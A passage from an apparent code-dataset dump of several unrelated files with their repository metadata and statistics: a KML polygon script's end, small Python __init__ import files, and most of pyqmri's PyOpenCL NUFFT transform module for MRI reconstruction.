3.1014800,33.4775765),(-23.1007719,33.4771111),(-23.0985403,33.4760014),(-23.0971670,33.4756614),(-23.0961800,33.4753392),(-23.0914593,33.4720458),(-23.0895710,33.4706855)]
polygon2dup = multipolygondup.newpolygon(name="TestPolygonWithInner")
# outer
polygon2dup.outerboundaryis = [(-23.1465626,33.4720458),(-23.1454468,33.4739073),(-23.1457901,33.4752676),(-23.1480217,33.4779881),(-23.1473351,33.4812096),(-23.1423569,33.4823551),(-23.1374645,33.4820687),(-23.1346321,33.4826414),(-23.1316280,33.4851469),(-23.1281948,33.4873660),(-23.1245041,33.4866502),(-23.1205559,33.4845742),(-23.1206417,33.4812812),(-23.1218433,33.4776301),(-23.1249332,33.4771290),(-23.1258774,33.4756972),(-23.1254482,33.4739073),(-23.1239033,33.4731198),(-23.1209850,33.4714015),(-23.1181526,33.4716163),(-23.1160069,33.4726902),(-23.1136036,33.4758403),(-23.1112862,33.4777017),(-23.1087971,33.4777733),(-23.1060505,33.4766995),(-23.1045914,33.4750528),(-23.1034756,33.4726186),(-23.1031322,33.4710435),(-23.1037331,33.4693967),(-23.1070805,33.4675352),(-23.1100845,33.4663896),(-23.1137753,33.4657451),(-23.1207275,33.4653871),(-23.1247616,33.4640983),(-23.1266499,33.4624514),(-23.1287098,33.4604465),(-23.1337738,33.4598020),(-23.1372070,33.4599452),(-23.1396961,33.4611625),(-23.1433868,33.4640983),(-23.1451893,33.4664612),(-23.1485367,33.4683228),(-23.1465626,33.4720458)]
# inner
polygon2dup.innerboundaryis = [(-23.1359196,33.4741937),(-23.1382370,33.4729050),(-23.1374645,33.4711151),(-23.1354904,33.4698263),(-23.1334305,33.4704707),(-23.1333447,33.4723322),(-23.1342888,33.4739789),(-23.1359196,33.4741937)]
kml.save("multi_geometries_duplicate.kml")
| 204.12
| 1,831
| 0.733784
| 1,527
| 10,206
| 4.902423
| 0.229862
| 0.012824
| 0.018434
| 0.009618
| 0.882447
| 0.882447
| 0.861608
| 0.861608
| 0.861608
| 0.861608
| 0
| 0.620673
| 0.009406
| 10,206
| 49
| 1,832
| 208.285714
| 0.119782
| 0.007153
| 0
| 0
| 1
| 0
| 0.022519
| 0.002963
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03125
| 0
| 0.03125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
e15892cbc362e9baa7c2de7664b8a7f2a77201e0
| 133
|
py
|
Python
|
api/views/__init__.py
|
leupibr/undeep
|
66c8689c438872d4ea38b95e985023f246a99ea0
|
[
"MIT"
] | 1
|
2020-06-04T13:21:32.000Z
|
2020-06-04T13:21:32.000Z
|
api/views/__init__.py
|
leupibr/undeep
|
66c8689c438872d4ea38b95e985023f246a99ea0
|
[
"MIT"
] | 18
|
2020-06-04T17:28:08.000Z
|
2022-02-27T06:00:53.000Z
|
api/views/__init__.py
|
leupibr/undeep
|
66c8689c438872d4ea38b95e985023f246a99ea0
|
[
"MIT"
] | 2
|
2020-06-04T13:19:55.000Z
|
2020-09-01T13:38:48.000Z
|
import api.views.categories
import api.views.documents
import api.views.management
import api.views.statistics
import api.views.auth
| 22.166667
| 27
| 0.849624
| 20
| 133
| 5.65
| 0.4
| 0.39823
| 0.619469
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075188
| 133
| 5
| 28
| 26.6
| 0.918699
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e17da5b00fddafce6eed9530eb160de671e5cb87
| 58
|
py
|
Python
|
addons/crnd_web_diagram_plus/models/__init__.py
|
marionumza/vocal_v12
|
480990e919c9410903e06e7813ee92800bd6a569
|
[
"Unlicense"
] | null | null | null |
addons/crnd_web_diagram_plus/models/__init__.py
|
marionumza/vocal_v12
|
480990e919c9410903e06e7813ee92800bd6a569
|
[
"Unlicense"
] | null | null | null |
addons/crnd_web_diagram_plus/models/__init__.py
|
marionumza/vocal_v12
|
480990e919c9410903e06e7813ee92800bd6a569
|
[
"Unlicense"
] | 1
|
2021-05-05T07:59:08.000Z
|
2021-05-05T07:59:08.000Z
|
from . import ir_ui_view
from . import ir_act_window_view
| 19.333333
| 32
| 0.827586
| 11
| 58
| 3.909091
| 0.636364
| 0.465116
| 0.55814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 58
| 2
| 33
| 29
| 0.86
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e194b51b3dd136d1af4a890bc741b28aa8bf2b94
| 49,799
|
py
|
Python
|
pyqmri/transforms.py
|
philippgualdi/PyQMRI
|
5de3a7da5feb2d01b746acd47d1dba91a8a1417e
|
[
"Apache-2.0"
] | 18
|
2019-08-09T18:42:33.000Z
|
2022-03-22T07:56:48.000Z
|
pyqmri/transforms.py
|
philippgualdi/PyQMRI
|
5de3a7da5feb2d01b746acd47d1dba91a8a1417e
|
[
"Apache-2.0"
] | 4
|
2020-10-05T15:56:58.000Z
|
2021-08-19T11:51:54.000Z
|
pyqmri/transforms.py
|
philippgualdi/PyQMRI
|
5de3a7da5feb2d01b746acd47d1dba91a8a1417e
|
[
"Apache-2.0"
] | 5
|
2020-04-21T17:28:58.000Z
|
2020-12-05T21:44:50.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Module holding the classes for different FFT operators."""
import numpy as np
import pyopencl as cl
import pyopencl.array as clarray
from gpyfft.fft import FFT
from pkg_resources import resource_filename
from pyqmri._helper_fun._calckbkernel import calckbkernel
from pyqmri._helper_fun import CLProgram as Program
class PyOpenCLnuFFT():
"""Base class for FFT calculation.
This class serves as the base class for all FFT object used in
the varous optimization algorithms. It provides a factory method
to generate a FFT object based on the input.
Parameters
----------
ctx : PyOpenCL.Context
The context for the PyOpenCL computations.
queue : PyOpenCL.Queue
The computation Queue for the PyOpenCL kernels.
fft_dim : tuple of int
The dimensions to take the fft over
DTYPE : Numpy.dtype
The comlex precision type. Currently complex64 is used.
DTYPE_real : Numpy.dtype
The real precision type. Currently float32 is used.
Attributes
----------
DTYPE : Numpy.dtype
The comlex precision type. Currently complex64 is used.
DTYPE_real : Numpy.dtype
The real precision type. Currently float32 is used.
ctx : PyOpenCL.Context
The context for the PyOpenCL computations.
queue : PyOpenCL.Queue
The computation Queue for the PyOpenCL kernels.
prg : PyOpenCL.Program
The PyOpenCL Program Object containing the compiled kernels.
fft_dim : tuple of int
The dimensions to take the fft over
"""
def __init__(self, ctx, queue, fft_dim, DTYPE, DTYPE_real):
self.DTYPE = DTYPE
self.DTYPE_real = DTYPE_real
self.ctx = ctx
self.queue = queue
self.prg = None
self.fft_dim = fft_dim
@staticmethod
def create(ctx,
queue,
par,
kwidth=5,
klength=1000,
DTYPE=np.complex64,
DTYPE_real=np.float32,
radial=False,
SMS=False,
streamed=False):
"""FFT factory method.
Based on the inputs this method decides which FFT object should be
returned.
Parameters
----------
ctx : PyOpenCL.Context
The context for the PyOpenCL computations.
queue : PyOpenCL.Queue
The computation Queue for the PyOpenCL kernels.
par : dict
A python dict containing the necessary information to setup the
object. Needs to contain the number of slices (NSlice), number of
scans (NScan), image dimensions (dimX, dimY), number of coils (NC),
sampling points (N) and read outs (NProj) a PyOpenCL queue (queue)
and the complex coil sensitivities (C).
kwidth : int, 5
The width of the sampling kernel for regridding of non-uniform
kspace samples.
klength : int, 200
The length of the kernel lookup table which samples the contineous
gridding kernel.
DTYPE : Numpy.dtype, numpy.complex64
The comlex precision type. Currently complex64 is used.
DTYPE_real : Numpy.dtype, numpy.float32
The real precision type. Currently float32 is used.
radial : bool, False
Switch for Cartesian (False) and non-Cartesian (True) FFT.
SMS : bool, False
Switch between Simultaneous Multi Slice reconstruction (True) and
simple slice by slice reconstruction.
streamed : bool, False
Switch between normal reconstruction in one big block versus
streamed reconstruction of smaller blocks.
Returns
-------
PyOpenCLnuFFT object:
The setup FFT object.
Raises
------
AssertionError:
If the Combination of passed flags to choose the
FFT aren't compatible with each other. E.g.: Radial and SMS True.
"""
if not streamed:
if radial is True and SMS is False:
if par["is3D"]:
obj = PyOpenCL3DRadialNUFFT(
ctx,
queue,
par,
kwidth=kwidth,
klength=klength,
DTYPE=DTYPE,
DTYPE_real=DTYPE_real)
else:
obj = PyOpenCLRadialNUFFT(
ctx,
queue,
par,
kwidth=kwidth,
klength=klength,
DTYPE=DTYPE,
DTYPE_real=DTYPE_real)
elif SMS is True and radial is False:
obj = PyOpenCLSMSNUFFT(
ctx,
queue,
par,
DTYPE=DTYPE,
DTYPE_real=DTYPE_real)
elif SMS is False and radial is False:
obj = PyOpenCLCartNUFFT(
ctx,
queue,
par,
DTYPE=DTYPE,
DTYPE_real=DTYPE_real)
else:
raise AssertionError("Combination of Radial "
"and SMS not allowed")
if DTYPE == np.complex128:
print('Using double precision')
file = open(
resource_filename(
'pyqmri', 'kernels/OpenCL_gridding_double.c'))
obj.prg = Program(
obj.ctx,
file.read())
else:
print('Using single precision')
file = open(
resource_filename(
'pyqmri', 'kernels/OpenCL_gridding_single.c'))
obj.prg = Program(
obj.ctx,
file.read())
else:
if radial is True and SMS is False:
if par["is3D"]:
raise NotImplementedError("3D non-cartesian and streamed\
not implemented")
obj = PyOpenCLRadialNUFFT(
ctx,
queue,
par,
kwidth=kwidth,
klength=klength,
DTYPE=DTYPE,
DTYPE_real=DTYPE_real,
streamed=True)
elif SMS is True and radial is False:
obj = PyOpenCLSMSNUFFT(
ctx,
queue,
par,
DTYPE=DTYPE,
DTYPE_real=DTYPE_real,
streamed=True)
elif SMS is False and radial is False:
obj = PyOpenCLCartNUFFT(
ctx,
queue,
par,
DTYPE=DTYPE,
DTYPE_real=DTYPE_real,
streamed=True)
else:
raise AssertionError("Combination of Radial "
"and SMS not allowed")
if DTYPE == np.complex128:
print('Using double precision')
file = open(
resource_filename(
'pyqmri',
'kernels/OpenCL_gridding_slicefirst_double.c'))
obj.prg = Program(
obj.ctx,
file.read())
else:
print('Using single precision')
file = open(
resource_filename(
'pyqmri',
'kernels/OpenCL_gridding_slicefirst_single.c'))
obj.prg = Program(
obj.ctx,
file.read())
file.close()
return obj
class PyOpenCLRadialNUFFT(PyOpenCLnuFFT):
"""Non-uniform FFT object.
This class performs the non-uniform FFT (NUFFT) operation. Linear
interpolation of a sampled gridding kernel is used to regrid points
from the non-cartesian grid back on the cartesian grid.
Parameters
----------
ctx : PyOpenCL.Context
The context for the PyOpenCL computations.
queue : PyOpenCL.Queue
The computation Queue for the PyOpenCL kernels.
par : dict
A python dict containing the necessary information to
setup the object. Needs to contain the number of slices (NSlice),
number of scans (NScan), image dimensions (dimX, dimY), number of
coils (NC), sampling points (N) and read outs (NProj)
a PyOpenCL queue (queue) and the complex coil
sensitivities (C).
kwidth : int
The width of the sampling kernel for regridding of non-uniform
kspace samples.
klength : int
The length of the kernel lookup table which samples the contineous
gridding kernel.
DTYPE : Numpy.dtype
The comlex precision type. Currently complex64 is used.
DTYPE_real : Numpy.dtype
The real precision type. Currently float32 is used.
Attributes
----------
traj : PyOpenCL.Array
The comlex sampling trajectory
dcf : PyOpenCL.Array
The densitiy compenation function
ogf (float):
The overgriddingfactor for non-cartesian k-spaces.
fft_shape : tuple of ints
3 dimensional tuple. Dim 0 containts all Scans, Coils and Slices.
Dim 1 and 2 the overgridded image dimensions.
fft_scale : float32
The scaling factor to achieve a good adjointness of the forward and
backward FFT.
cl_kerneltable (PyOpenCL.Buffer):
The gridding lookup table as read only Buffer
cl_deapo (PyOpenCL.Buffer):
The deapodization lookup table as read only Buffer
par_fft : int
The number of parallel fft calls. Typically it iterates over the
Scans.
fft : gpyfft.fft.FFT
The fft object created from gpyfft (A wrapper for clFFT). The object
is created only once an reused in each iterations, iterationg over
all scans to keep the memory footprint low.
prg : PyOpenCL.Program
The PyOpenCL.Program object containing the necessary kernels to
execute the linear Operator. This will be determined by the
factory and set after the object is created.
"""
def __init__(
self,
ctx,
queue,
par,
kwidth=5,
klength=200,
DTYPE=np.complex64,
DTYPE_real=np.float32,
streamed=False):
super().__init__(ctx, queue, par["fft_dim"], DTYPE, DTYPE_real)
self.ogf = par["ogf"]
if streamed:
self.fft_shape = (
par["NScan"] *
par["NC"] *
(par["par_slices"] + par["overlap"]),
int(round(par["dimY"]*self.ogf)),
int(round(par["dimX"]*self.ogf)))
else:
self.fft_shape = (
par["NScan"] *
par["NC"] *
par["NSlice"],
int(round(par["dimY"]*self.ogf)),
int(round(par["dimX"]*self.ogf)))
self.fft_scale = DTYPE_real(
np.sqrt(np.prod(self.fft_shape[self.fft_dim[0]:])))
(kerneltable, kerneltable_FT) = calckbkernel(
kwidth, self.ogf, par["N"], klength)
deapo = 1 / kerneltable_FT.astype(DTYPE_real)
self.cl_kerneltable = cl.Buffer(
self.ctx,
cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR,
hostbuf=kerneltable.astype(DTYPE_real).data)
self.cl_deapo = cl.Buffer(
self.ctx,
cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR,
hostbuf=deapo.data)
self.dcf = clarray.to_device(self.queue, par["dcf"])
self.traj = clarray.to_device(self.queue, par["traj"])
self._tmp_fft_array = (
clarray.zeros(
self.queue,
(self.fft_shape),
dtype=DTYPE))
if par["use_GPU"]:
self.par_fft = int(
self.fft_shape[0] / par["NScan"])
else:
self.par_fft = self.fft_shape[0]
self.iternumber = int(self.fft_shape[0]/self.par_fft)
self.fft = FFT(ctx, queue, self._tmp_fft_array[
0:self.par_fft, ...],
out_array=self._tmp_fft_array[
0:self.par_fft, ...],
axes=self.fft_dim)
self._kernelpoints = kerneltable.size
self._kwidth = kwidth / 2
self._check = np.ones(self.fft_shape[-1], dtype=DTYPE_real)
self._check[1::2] = -1
self._check = clarray.to_device(self.queue, self._check)
self._gridsize = self.fft_shape[-1]
def __del__(self):
"""Explicitly delete OpenCL Objets."""
del self.traj
del self.dcf
del self._tmp_fft_array
del self.cl_kerneltable
del self.cl_deapo
del self._check
del self.queue
del self.ctx
del self.prg
del self.fft
def FFTH(self, sg, s, wait_for=None, scan_offset=0):
"""Perform the inverse (adjoint) NUFFT operation.
Parameters
----------
sg : PyOpenCL.Array
The complex image data.
s : PyOpenCL.Array
The non-uniformly gridded k-space
wait_for : list of PyopenCL.Event, None
A List of PyOpenCL events to wait for.
scan_offset : int, 0
Offset compared to the first acquired scan.
Returns
-------
PyOpenCL.Event: A PyOpenCL event to wait for.
"""
if wait_for is None:
wait_for = []
# Zero tmp arrays
self._tmp_fft_array.add_event(
self.prg.zero_tmp(
self.queue,
(self._tmp_fft_array.size,
),
None,
self._tmp_fft_array.data,
wait_for=self._tmp_fft_array.events))
# Grid k-space
self._tmp_fft_array.add_event(
self.prg.grid_lut(
self.queue,
(s.shape[0], s.shape[1] * s.shape[2],
s.shape[-2] * self._gridsize),
None,
self._tmp_fft_array.data,
s.data,
self.traj.data,
np.int32(self._gridsize),
np.int32(sg.shape[2]),
self.DTYPE_real(self._kwidth),
self.dcf.data,
self.cl_kerneltable,
np.int32(self._kernelpoints),
np.int32(scan_offset),
wait_for=(wait_for +
s.events + self._tmp_fft_array.events)))
# FFT
self._tmp_fft_array.add_event(
self.prg.fftshift(
self.queue,
(self.fft_shape[0],
self.fft_shape[1],
self.fft_shape[2]),
None,
self._tmp_fft_array.data,
self._check.data,
wait_for=self._tmp_fft_array.events))
cl.wait_for_events(self._tmp_fft_array.events)
fft_events = []
for j in range(self.iternumber):
fft_events.append(self.fft.enqueue_arrays(
data=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
result=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
forward=False)[0])
self._tmp_fft_array.add_event(
self.prg.fftshift(
self.queue,
(self.fft_shape[0],
self.fft_shape[1],
self.fft_shape[2]),
None,
self._tmp_fft_array.data,
self._check.data,
wait_for=fft_events))
return self.prg.deapo_adj(
self.queue,
(sg.shape[0] * sg.shape[1] *
sg.shape[2], sg.shape[3], sg.shape[4]),
None,
sg.data,
self._tmp_fft_array.data,
self.cl_deapo,
np.int32(self._tmp_fft_array.shape[-1]),
self.DTYPE_real(self.fft_scale),
self.DTYPE_real(self.ogf),
wait_for=(wait_for + sg.events +
self._tmp_fft_array.events))
def FFT(self, s, sg, wait_for=None, scan_offset=0):
"""Perform the forward NUFFT operation.
Parameters
----------
s : PyOpenCL.Array
The non-uniformly gridded k-space.
sg : PyOpenCL.Array
The complex image data.
wait_for : list of PyopenCL.Event, None
A List of PyOpenCL events to wait for.
scan_offset : int, 0
Offset compared to the first acquired scan.
Returns
-------
PyOpenCL.Event: A PyOpenCL event to wait for.
"""
if wait_for is None:
wait_for = []
# Zero tmp arrays
self._tmp_fft_array.add_event(
self.prg.zero_tmp(
self.queue,
(self._tmp_fft_array.size,
),
None,
self._tmp_fft_array.data,
wait_for=
self._tmp_fft_array.events))
# Deapodization and Scaling
self._tmp_fft_array.add_event(
self.prg.deapo_fwd(
self.queue,
(sg.shape[0] * sg.shape[1] * sg.shape[2],
sg.shape[3], sg.shape[4]),
None,
self._tmp_fft_array.data,
sg.data,
self.cl_deapo,
np.int32(self._tmp_fft_array.shape[-1]),
self.DTYPE_real(1 / self.fft_scale),
self.DTYPE_real(self.ogf),
wait_for=wait_for + sg.events + self._tmp_fft_array.events))
# FFT
self._tmp_fft_array.add_event(
self.prg.fftshift(
self.queue,
(self.fft_shape[0],
self.fft_shape[1],
self.fft_shape[2]),
None,
self._tmp_fft_array.data,
self._check.data,
wait_for=self._tmp_fft_array.events))
cl.wait_for_events(self._tmp_fft_array.events)
fft_events = []
for j in range(self.iternumber):
fft_events.append(self.fft.enqueue_arrays(
data=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
result=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
forward=True)[0])
self._tmp_fft_array.add_event(
self.prg.fftshift(
self.queue,
(self.fft_shape[0],
self.fft_shape[1],
self.fft_shape[2]),
None,
self._tmp_fft_array.data,
self._check.data,
wait_for=fft_events))
# Resample on Spoke
return self.prg.invgrid_lut(
self.queue,
(s.shape[0], s.shape[1] * s.shape[2], s.shape[-2] *
self._gridsize),
None,
s.data,
self._tmp_fft_array.data,
self.traj.data,
np.int32(self._gridsize),
np.int32(s.shape[2]),
self.DTYPE_real(self._kwidth),
self.dcf.data,
self.cl_kerneltable,
np.int32(self._kernelpoints),
np.int32(scan_offset),
wait_for=s.events + wait_for + self._tmp_fft_array.events)
class PyOpenCL3DRadialNUFFT(PyOpenCLnuFFT):
"""Non-uniform FFT object.
This class performs the 3D non-uniform FFT (NUFFT) operation. Linear
interpolation of a sampled gridding kernel is used to regrid points
from the non-cartesian grid back on the cartesian grid.
Parameters
----------
ctx : PyOpenCL.Context
The context for the PyOpenCL computations.
queue : PyOpenCL.Queue
The computation Queue for the PyOpenCL kernels.
par : dict
A python dict containing the necessary information to
setup the object. Needs to contain the number of slices (NSlice),
number of scans (NScan), image dimensions (dimX, dimY), number of
coils (NC), sampling points (N) and read outs (NProj)
a PyOpenCL queue (queue) and the complex coil
sensitivities (C).
kwidth : int
The width of the sampling kernel for regridding of non-uniform
kspace samples.
klength : int
The length of the kernel lookup table which samples the contineous
gridding kernel.
DTYPE : Numpy.dtype
The comlex precision type. Currently complex64 is used.
DTYPE_real : Numpy.dtype
The real precision type. Currently float32 is used.
Attributes
----------
traj : PyOpenCL.Array
The comlex sampling trajectory
dcf : PyOpenCL.Array
The densitiy compenation function
ogf (float):
The overgriddingfactor for non-cartesian k-spaces.
fft_shape : tuple of ints
3 dimensional tuple. Dim 0 containts all Scans, Coils and Slices.
Dim 1 and 2 the overgridded image dimensions.
fft_scale : float32
The scaling factor to achieve a good adjointness of the forward and
backward FFT.
cl_kerneltable (PyOpenCL.Buffer):
The gridding lookup table as read only Buffer
cl_deapo (PyOpenCL.Buffer):
The deapodization lookup table as read only Buffer
par_fft : int
The number of parallel fft calls. Typically it iterates over the
Scans.
fft : gpyfft.fft.FFT
The fft object created from gpyfft (A wrapper for clFFT). The object
is created only once an reused in each iterations, iterationg over
all scans to keep the memory footprint low.
prg : PyOpenCL.Program
The PyOpenCL.Program object containing the necessary kernels to
execute the linear Operator. This will be determined by the
factory and set after the object is created.
"""
def __init__(
self,
ctx,
queue,
par,
kwidth=5,
klength=200,
DTYPE=np.complex64,
DTYPE_real=np.float32,
streamed=False):
super().__init__(ctx, queue, par["fft_dim"], DTYPE, DTYPE_real)
# self.ogf = par["N"]/par["dimX"]
self.ogf = par["ogf"]
self.fft_shape = (
par["NScan"] *
par["NC"],
int(round(par["NSlice"]*self.ogf)),
int(round(par["dimY"]*self.ogf)),
int(round(par["dimX"]*self.ogf)))
self.fft_scale = DTYPE_real(
np.sqrt(np.prod(self.fft_shape[-3:])))
(kerneltable, kerneltable_FT) = calckbkernel(
kwidth, self.ogf, par["N"], klength)
deapo = 1 / kerneltable_FT.astype(DTYPE_real)
self.cl_kerneltable = cl.Buffer(
self.ctx,
cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR,
hostbuf=kerneltable.astype(DTYPE_real).data)
self.cl_deapo = cl.Buffer(
self.ctx,
cl.mem_flags.READ_ONLY | cl.mem_flags.COPY_HOST_PTR,
hostbuf=deapo.data)
self.dcf = clarray.to_device(self.queue, par["dcf"])
self.traj = clarray.to_device(self.queue, par["traj"])
self._tmp_fft_array = (
clarray.zeros(
self.queue,
(self.fft_shape),
dtype=DTYPE))
if par["use_GPU"]:
self.par_fft = int(
self.fft_shape[0] / par["NScan"])
else:
self.par_fft = self.fft_shape[0]
self.iternumber = int(self.fft_shape[0]/self.par_fft)
self.fft = FFT(ctx, queue, self._tmp_fft_array[
0:self.par_fft, ...],
out_array=self._tmp_fft_array[
0:self.par_fft, ...],
axes=self.fft_dim)
self._kernelpoints = kerneltable.size
self._kwidth = kwidth / 2
self._check = np.ones(self.fft_shape[-1], dtype=DTYPE_real)
self._check[1::2] = -1
self._check = clarray.to_device(self.queue, self._check)
self._gridsize = self.fft_shape[-1]
def __del__(self):
"""Explicitly delete OpenCL Objets."""
del self.traj
del self.dcf
del self._tmp_fft_array
del self.cl_kerneltable
del self.cl_deapo
del self._check
del self.queue
del self.ctx
del self.prg
del self.fft
def FFTH(self, sg, s, wait_for=None, scan_offset=0):
"""Perform the inverse (adjoint) NUFFT operation.
Parameters
----------
sg : PyOpenCL.Array
The complex image data.
s : PyOpenCL.Array
The non-uniformly gridded k-space
wait_for : list of PyopenCL.Event, None
A List of PyOpenCL events to wait for.
scan_offset : int, 0
Offset compared to the first acquired scan.
Returns
-------
PyOpenCL.Event: A PyOpenCL event to wait for.
"""
if wait_for is None:
wait_for = []
# Zero tmp arrays
self._tmp_fft_array.add_event(
self.prg.zero_tmp(
self.queue,
(self._tmp_fft_array.size,
),
None,
self._tmp_fft_array.data,
wait_for=self._tmp_fft_array.events))
# Grid k-space
self._tmp_fft_array.add_event(
self.prg.grid_lut3D(
self.queue,
(s.shape[0], s.shape[1],
s.shape[-2] * self._gridsize),
None,
self._tmp_fft_array.data,
s.data,
self.traj.data,
np.int32(self._gridsize),
np.int32(sg.shape[2]),
self.DTYPE_real(self._kwidth),
self.dcf.data,
self.cl_kerneltable,
np.int32(self._kernelpoints),
np.int32(scan_offset),
wait_for=(wait_for +
s.events + self._tmp_fft_array.events)))
# FFT
self._tmp_fft_array.add_event(
self.prg.fftshift3D(
self.queue,
(np.prod(self.fft_shape[:2]),
self.fft_shape[2],
self.fft_shape[3]),
None,
self._tmp_fft_array.data,
self._check.data,
wait_for=self._tmp_fft_array.events))
cl.wait_for_events(self._tmp_fft_array.events)
fft_events = []
for j in range(self.iternumber):
fft_events.append(self.fft.enqueue_arrays(
data=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
result=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
forward=False)[0])
self._tmp_fft_array.add_event(
self.prg.fftshift3D(
self.queue,
(np.prod(self.fft_shape[:2]),
self.fft_shape[2],
self.fft_shape[3]),
None,
self._tmp_fft_array.data,
self._check.data,
wait_for=fft_events))
return self.prg.deapo_adj3D(
self.queue,
(sg.shape[0] * sg.shape[1] *
sg.shape[2], sg.shape[3], sg.shape[4]),
None,
sg.data,
self._tmp_fft_array.data,
self.cl_deapo,
np.int32(self._tmp_fft_array.shape[-1]),
self.DTYPE_real(self.fft_scale),
self.DTYPE_real(self.ogf),
wait_for=(wait_for + sg.events +
self._tmp_fft_array.events))
def FFT(self, s, sg, wait_for=None, scan_offset=0):
"""Perform the forward NUFFT operation.
Parameters
----------
s : PyOpenCL.Array
The non-uniformly gridded k-space.
sg : PyOpenCL.Array
The complex image data.
wait_for : list of PyopenCL.Event, None
A List of PyOpenCL events to wait for.
scan_offset : int, 0
Offset compared to the first acquired scan.
Returns
-------
PyOpenCL.Event: A PyOpenCL event to wait for.
"""
if wait_for is None:
wait_for = []
# Zero tmp arrays
self._tmp_fft_array.add_event(
self.prg.zero_tmp(
self.queue,
(self._tmp_fft_array.size,
),
None,
self._tmp_fft_array.data,
wait_for=
self._tmp_fft_array.events))
# Deapodization and Scaling
self._tmp_fft_array.add_event(
self.prg.deapo_fwd3D(
self.queue,
(sg.shape[0] * sg.shape[1] * sg.shape[2],
sg.shape[3], sg.shape[4]),
None,
self._tmp_fft_array.data,
sg.data,
self.cl_deapo,
np.int32(self._tmp_fft_array.shape[-1]),
self.DTYPE_real(1 / self.fft_scale),
self.DTYPE_real(self.ogf),
wait_for=wait_for + sg.events + self._tmp_fft_array.events))
# FFT
self._tmp_fft_array.add_event(
self.prg.fftshift3D(
self.queue,
(np.prod(self.fft_shape[:2]),
self.fft_shape[2],
self.fft_shape[3]),
None,
self._tmp_fft_array.data,
self._check.data,
wait_for=self._tmp_fft_array.events))
cl.wait_for_events(self._tmp_fft_array.events)
fft_events = []
for j in range(self.iternumber):
fft_events.append(self.fft.enqueue_arrays(
data=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
result=self._tmp_fft_array[
j * self.par_fft:(j + 1) * self.par_fft, ...],
forward=True)[0])
self._tmp_fft_array.add_event(
self.prg.fftshift3D(
self.queue,
(np.prod(self.fft_shape[:2]),
self.fft_shape[2],
self.fft_shape[3]),
None,
self._tmp_fft_array.data,
self._check.data,
wait_for=fft_events))
# Resample on Spoke
return self.prg.invgrid_lut3D(
self.queue,
(s.shape[0], s.shape[1], s.shape[-2] *
self._gridsize),
None,
s.data,
self._tmp_fft_array.data,
self.traj.data,
np.int32(self._gridsize),
np.int32(s.shape[2]),
self.DTYPE_real(self._kwidth),
self.dcf.data,
self.cl_kerneltable,
np.int32(self._kernelpoints),
np.int32(scan_offset),
wait_for=s.events + wait_for + self._tmp_fft_array.events)
class PyOpenCLCartNUFFT(PyOpenCLnuFFT):
"""Cartesian FFT object.
This class performs the FFT operation.
Parameters
----------
ctx : PyOpenCL.Context
The context for the PyOpenCL computations.
queue : PyOpenCL.Queue
The computation Queue for the PyOpenCL kernels.
par : dict A python dict containing the necessary information to
setup the object. Needs to contain the number of slices (NSlice),
number of scans (NScan), image dimensions (dimX, dimY), number of
coils (NC), sampling points (N) and read outs (NProj)
a PyOpenCL queue (queue) and the complex coil
sensitivities (C).
DTYPE : Numpy.dtype
The comlex precision type. Currently complex64 is used.
DTYPE_real : Numpy.dtype
The real precision type. Currently float32 is used.
Attributes
----------
fft_shape : tuple of ints
3 dimensional tuple. Dim 0 containts all Scans, Coils and Slices.
Dim 1 and 2 the overgridded image dimensions.
fft_scale : float32
The scaling factor to achieve a good adjointness of the forward and
backward FFT.
par_fft : int
The number of parallel fft calls. Typically it iterates over the
Scans.
fft : gpyfft.fft.FFT
The fft object created from gpyfft (A wrapper for clFFT). The object
is created only once an reused in each iterations, iterationg over
all scans to keep the memory footprint low.
mask : PyOpenCL.Array
The undersampling mask for the Cartesian grid.
prg : PyOpenCL.Program
The PyOpenCL.Program object containing the necessary kernels to
execute the linear Operator. This will be determined by the
factory and set after the object is created.
"""
def __init__(
self,
ctx,
queue,
par,
DTYPE=np.complex64,
DTYPE_real=np.float32,
streamed=False):
super().__init__(ctx, queue, par["fft_dim"], DTYPE, DTYPE_real)
if streamed:
self.fft_shape = (
par["NScan"] *
par["NC"] *
(par["par_slices"] + par["overlap"]),
par["dimY"],
par["dimX"])
else:
if par["is3D"]:
self.fft_shape = (
par["NScan"] *
par["NC"],
par["NSlice"],
par["dimY"],
par["dimX"])
else:
self.fft_shape = (
par["NScan"] *
par["NC"] *
par["NSlice"],
par["dimY"],
